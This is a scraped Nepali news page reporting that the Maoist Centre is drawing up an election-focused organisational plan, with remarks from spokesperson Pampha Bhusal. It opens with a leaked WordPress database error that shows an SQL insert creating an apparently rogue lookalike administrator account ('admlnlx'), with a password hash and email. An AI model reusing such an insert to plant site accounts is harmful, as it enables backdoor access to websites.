WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BThhEH/pR7FseddaZr9tRpaHNmXsNs/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 17:09:21', '', 'admlnlx', 'admlnlx')
काठमाडौँ, मंसिर १९–
नेकपा माओवादी केन्द्रले आगामी निर्वाचनलाई मध्यनजर गरेर संगठनात्मक कार्ययोजना बनाउने निर्णय गरेको छ । उसले आइतबारको केन्द्रीय कार्यालय बैठकबाट संगठन विस्तार सम्बन्धि छलफललाई अघि पनि बढाएको छ ।
पार्टी अध्यक्ष एवम् प्रधानमन्त्री पुष्पकमल दाहाल ‘प्रचण्ड’को निजी निवास लाजिम्पाटमा आइतबार विहान पार्टी केन्द्रीय कार्यालय बैठक बसेको थियो । बैठकले निर्वाचन केन्दि्रत संगठनात्मक कार्ययोजना बनाएको र पोलिटव्युरो बैठकले त्यसलाई अनुमोदन गर्ने पार्टी प्रवक्ता पम्फा भुसालले जानकारी दिइन् ।
प्रवक्ता भुसालका अनुसार पार्टीको माथिल्लो निकायमा पदपूर्ति गर्ने विषयमा पनि आजै औपचारिक निर्णय लिइने तयारी छ ।